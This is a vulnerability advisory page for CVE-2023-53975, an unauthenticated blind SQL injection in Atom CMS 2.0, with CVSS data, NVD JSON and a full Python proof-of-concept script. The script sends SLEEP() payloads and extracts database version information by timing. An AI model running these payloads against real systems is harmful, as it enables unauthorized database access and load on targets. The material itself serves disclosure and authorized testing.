Security Vulnerability Report
CVE-2023-53975 CVSS 7.5 HIGH

CVE-2023-53975

Published: 2025-12-22 22:16:03
Last Modified: 2026-01-05 14:15:53

Description

Atom CMS 2.0 contains an unauthenticated SQL injection vulnerability that allows remote attackers to manipulate database queries through unvalidated parameters. Attackers can inject malicious SQL code in the 'id' query parameter of the admin index page (admin/index.php) to execute time-based blind SQL injection attacks. Because the injection is blind, data is recovered one true/false answer at a time by timing the response, and each "true" probe ties up a database connection for the requested SLEEP() interval — so even a detection run has a measurable load cost on the target.

CVSS Details

CVSS Score
7.5 (CVSS v3.1 base score, NVD primary). Treat this as a floor: the v3.1 vector below rates confidentiality impact as None even though the published PoC reads database contents (@@version), and the CNA-supplied CVSS v4.0 score recorded in the raw data at the bottom of this page is 9.3 CRITICAL with both confidentiality and integrity impact rated High.
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:thedigitalcraft:atomcms:2.0:*:*:*:*:*:*:* - VULNERABLE
Atom CMS 2.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only. It sends MySQL/MariaDB SLEEP() payloads to a live application: every positive probe stalls one of the target's database connections for the sleep duration, so run it only against an instance you own or are explicitly authorized to test, and not against a system under production load.
python
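#!/usr/bin/env python3
"""CVE-2023-53975 PoC - time-based blind SQL injection in Atom CMS 2.0.

Injection point: the ``id`` query parameter of ``admin/index.php``, reachable
without authentication.  Every probe appends a MySQL/MariaDB ``SLEEP()``
expression to that parameter and reads a single true/false answer out of the
server's response latency.

Authorized testing only.  Each positive probe holds one database connection
for ``sleep_seconds``; hammering a production instance with these probes is a
denial of service in its own right.

Original author: VulnCheck.  This revision measures a baseline round-trip
before the injected probe so that a slow host or a transport timeout is not
reported as a confirmed finding, and uses a monotonic clock for timing.
"""
import argparse
import sys
import time

# Default endpoint.  Override with --url, or assign ``target_url`` before
# calling the functions below (kept as a module global for compatibility).
target_url = "http://target.com/admin/index.php"

# Seconds the injected SLEEP() asks the database to stall.
SLEEP_SECONDS = 5
# HTTP read timeout.  It must exceed the sleep by a wide margin, otherwise
# every *positive* probe ends as a timeout and is discarded.
TIMEOUT_SECONDS = 30
# Fraction of the requested sleep that must show up as extra latency over the
# baseline before a probe counts as delayed (absorbs timer granularity and
# connection-reuse effects without accepting an unrelated slow response).
DELAY_TOLERANCE = 0.9
# Unmodified value for the parameter; all payloads are built on top of it and
# it is sent on its own to measure the baseline round-trip.
CONTROL_ID = "1"


def sleep_payload(sleep_seconds=SLEEP_SECONDS):
    """Return the detection payload: forces SLEEP() through a derived table."""
    return f"1 AND (SELECT * FROM (SELECT SLEEP({sleep_seconds}))test)"


def version_payload(sleep_seconds=SLEEP_SECONDS):
    """Return the oracle payload: sleeps only if ``@@version`` starts with '5'."""
    return (
        "1 AND (SELECT CASE WHEN (SUBSTRING(@@version,1,1)='5') "
        f"THEN SLEEP({sleep_seconds}) ELSE 0 END)"
    )


def looks_delayed(elapsed, baseline, sleep_seconds=SLEEP_SECONDS, tolerance=DELAY_TOLERANCE):
    """Return True when ``elapsed`` exceeds ``baseline`` by (most of) the sleep.

    Comparing against the baseline rather than against a fixed 5 s is what
    separates "the database slept" from "this host is slow": a target whose
    control request already takes 5 s would otherwise confirm every payload.
    """
    return (elapsed - baseline) >= sleep_seconds * tolerance


def sql_injection_test(payload, url=None, timeout=TIMEOUT_SECONDS):
    """Send ``payload`` as the ``id`` parameter and time the round-trip.

    Args:
        payload: raw value for ``id``; the HTTP client URL-encodes it.
        url: endpoint to request; defaults to the module-level ``target_url``.
        timeout: per-request timeout in seconds.

    Returns:
        ``(elapsed_seconds, status_code)``.  ``status_code`` is ``None`` when no
        HTTP response arrived (timeout or transport error).  On timeout
        ``elapsed_seconds`` is the time until the timeout fired, which says
        nothing about SLEEP(); callers must check ``status_code`` first.
    """
    # Imported lazily so the pure helpers above can be imported and tested on
    # a host without the requests package installed.
    import requests

    if url is None:
        url = target_url
    started = time.perf_counter()  # monotonic; wall-clock jumps can't fake a delay
    try:
        response = requests.get(url, params={"id": payload}, timeout=timeout)
    except requests.exceptions.Timeout:
        return time.perf_counter() - started, None
    except requests.exceptions.RequestException as exc:
        print(f"Error: {exc}")
        return 0.0, None
    return time.perf_counter() - started, response.status_code


def timed_probe(payload, baseline, sleep_seconds=SLEEP_SECONDS, url=None):
    """Send one probe and decide whether the database slept.

    Returns ``(delayed, elapsed_seconds)``.  A request with no HTTP response
    (``status_code is None``) is never reported as delayed, so a dead or
    overloaded target does not "confirm" every payload.
    """
    # Give the server room to finish the sleep before the client gives up.
    timeout = max(TIMEOUT_SECONDS, 3 * sleep_seconds)
    elapsed, status = sql_injection_test(payload, url=url, timeout=timeout)
    if status is None:
        return False, elapsed
    return looks_delayed(elapsed, baseline, sleep_seconds), elapsed


def extract_data(url=None, sleep_seconds=SLEEP_SECONDS):
    """Confirm the injection, then ask the oracle one question about ``@@version``.

    1. Time the control request (``id=1``) to get the baseline.
    2. Send the SLEEP() payload; report a finding only when the extra latency
       over the baseline matches the requested sleep.
    3. Reuse the oracle for the single boolean the original PoC tested: does
       ``@@version`` start with '5'?

    Returns True when the injection was confirmed, False otherwise.
    """
    print("[*] Measuring baseline response time...")
    baseline, status = sql_injection_test(CONTROL_ID, url=url)
    if status is None:
        print("[-] No response to the control request; aborting")
        return False
    print(f"[*] Baseline response time: {baseline:.2f}s")

    print("[*] Testing for SQL injection vulnerability...")
    delayed, elapsed = timed_probe(sleep_payload(sleep_seconds), baseline, sleep_seconds, url)
    if not delayed:
        print(f"[-] Vulnerability not detected (response time {elapsed:.2f}s vs baseline {baseline:.2f}s)")
        return False
    print(f"[+] Vulnerability confirmed! Response time: {elapsed:.2f}s (baseline {baseline:.2f}s)")

    print("[*] Extracting database version...")
    delayed, _ = timed_probe(version_payload(sleep_seconds), baseline, sleep_seconds, url)
    if delayed:
        print("[+] Database version starts with '5'")
    else:
        print("[+] Database version does not start with '5'")
    return True


def main(argv=None):
    """Parse the command line and run the PoC.

    Returns 0 when the injection was confirmed, 1 otherwise, so the script can
    be chained in a scan pipeline.
    """
    parser = argparse.ArgumentParser(description="CVE-2023-53975 Atom CMS SQL Injection PoC")
    parser.add_argument("--url", default=target_url,
                        help="admin/index.php endpoint (default: %(default)s)")
    parser.add_argument("--sleep", type=int, default=SLEEP_SECONDS,
                        help="SLEEP() duration in seconds (default: %(default)s)")
    args = parser.parse_args(argv)
    print("CVE-2023-53975 Atom CMS SQL Injection PoC")
    print("=" * 50)
    return 0 if extract_data(url=args.url, sleep_seconds=args.sleep) else 1


if __name__ == "__main__":
    sys.exit(main())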

References (as recorded in the raw NVD record below)
- https://github.com/thedigicraft/Atom.CMS — Product
- https://www.exploit-db.com/exploits/51086 — Exploit, Third Party Advisory, VDB Entry
- https://www.vulncheck.com/advisories/atom-cms-unauthenticated-sql-injection-via-admin-index-page — Third Party Advisory

Raw JSON Data

JSON
{"cve": {"id": "CVE-2023-53975", "sourceIdentifier": "[email protected]", "published": "2025-12-22T22:16:02.837", "lastModified": "2026-01-05T14:15:52.800", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "Atom CMS 2.0 contains an unauthenticated SQL injection vulnerability that allows remote attackers to manipulate database queries through unvalidated parameters. Attackers can inject malicious SQL code in the 'id' parameter of the admin index page to execute time-based blind SQL injection attacks."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 9.3, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": 
"NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}, {"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:thedigitalcraft:atomcms:2.0:*:*:*:*:*:*:*", "matchCriteriaId": "8949C5AC-7D10-43A8-929D-B6FCFE9F2DC7"}]}]}], "references": [{"url": "https://github.com/thedigicraft/Atom.CMS", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.exploit-db.com/exploits/51086", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory", "VDB Entry"]}, {"url": "https://www.vulncheck.com/advisories/atom-cms-unauthenticated-sql-injection-via-admin-index-page", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}